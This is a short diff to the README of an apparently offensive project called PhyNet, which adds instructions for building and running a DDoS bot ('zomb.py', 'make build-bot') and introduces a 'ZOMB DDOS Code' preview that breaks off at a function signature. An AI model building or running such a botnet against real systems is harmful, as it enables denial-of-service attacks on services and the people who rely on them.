4lxprime/PhyNet/README.md

 ```batch
 python3 zomb.py
 ```
-and you can just build it with the command `make build-bot`
+you can just build it (with nuitka) with the command `make build-bot` or run it with `make bot`

 ## ZOMB DDOS Code:
+here is a preview of the zomb ddos code for each mode, it's really basic but if you want to improve it, don't hesitate to contact me (my discord is in my profile)
 ```python
 def dos(
     s: sock,